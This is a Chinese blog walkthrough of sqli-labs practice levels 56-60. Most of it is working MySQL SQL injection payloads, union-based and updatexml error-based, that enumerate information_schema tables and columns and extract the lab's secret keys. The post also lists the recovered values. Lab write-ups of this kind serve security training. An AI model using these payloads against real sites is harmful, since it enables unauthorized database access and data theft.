sqli-labs靶场通关攻略 56-60

云舒zovn

于 2024-09-02 10:46:02 发布

阅读量265

点赞数 12

文章标签：数据库

本文链接：https://blog.csdn.net/2301_82061181/article/details/141806489

版权

主页有sqli-labs 靶场通关攻略 1-55

第五六关 less-56

步骤一：闭合方式：?id=1')-- +

步骤二：查询数据库

?id=-1') union select 1,2,database() --+

步骤三：联合查询查出网站的数据库表名

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'-- +

oem1p64ku9

步骤四：联合查询查出users表列名

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='oem1p64ku9'-- +

secret_69QZ

步骤五：获取目标信息

?id=-1') union select 1,2,secret_69QZ from challenges.oem1p64ku9-- +

输入登录框,提交成功

第五七关 less-57

步骤一：闭合方式：?id=1"-- +

步骤二：查询数据库

?id=-1" union select 1,2,database() --+

步骤三：联合查询查出网站的数据库表名

?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'-- +

ufon3t1nq1

步骤四：联合查询查出users表列名

?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='ufon3t1nq1'-- +

secret_3WDG

步骤五：获取目标信息

?id=-1" union select 1,2,secret_3WDG from challenges.ufon3t1nq1-- +

rVaX7lFCcWbcinJHz4XPLQHr

输入登录框,提交成功

第五八关 less-58

步骤一：闭合方式：?id=1' --+

步骤二：查询数据库

?id=1' and updatexml(1,concat(1,database()),1) --+

步骤三：查出网站的数据库表名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)-- +

3lqqm8344u

步骤四：查出users表列名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='3lqqm8344u '),0x7e),1)-- +

secret_XXL3

步骤五：获取目标信息

?id=1' and updatexml(1,concat(0x7e,(select secret_XXL3 from challenges.3lqqm8344u),0x7e),1)-- +

4oNbuAyDfYPLcH67K20xQzDh

输入登录框,提交成功

第五九关 less-59

步骤一：闭合方式：?id=1 --+

步骤二：查询数据库

?id=1 a nd updatexml(1,concat(1,database()),1) --+

步骤三：查出网站的数据库表名

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)-- +

6bkswmx018

步骤四：查出users表列名

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='6bkswmx018'),0x7e),1)-- +

secret_BIXB

步骤五：获取目标信息

?id=1 and updatexml(1,concat(0x7e,(select secret_BIXB from challenges.6bkswmx018),0x7e),1)-- +

joyZrDvuYEZQqVbuAaEfN5N4

输入登录框,提交成功

第六十关 less-60

步骤一：闭合方式：?id=1") --+

步骤二：查询数据库

?id=1") and updatexml(1,concat(1,database()),1) --+

步骤三：查出网站的数据库表名

?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)-- +

9ihh6w5lpg

步骤四：查出users表列名

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='9ihh6w5lpg'),0x7e),1)-- +

secret_CHXB

步骤五：获取目标信息

?id=1") and updatexml(1,concat(0x7e,(select secret_CHXB from challenges.9ihh6w5lpg),0x7e),1)-- +

vi4845P9Xmp8nfKaCUmEsNod

输入登录框,提交成功

云舒zovn

关注

12
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
sqli-labs靶场通关攻略 56-60

步骤一：闭合方式：?id=1')-- +步骤一：闭合方式：?id=1") --+步骤三：联合查询查出网站的数据库表名。步骤四：联合查询查出users表列名。步骤一：闭合方式：?步骤三：联合查询查出网站的数据库表名。步骤四：联合查询查出users表列名。步骤一：闭合方式：?步骤一：闭合方式：?步骤三：查出网站的数据库表名。步骤四：查出users表列名。步骤三：查出网站的数据库表名。步骤四：查出users表列名。步骤三：查出网站的数据库表名。步骤四：查出users表列名。第五六关 less-56。
复制链接

扫一扫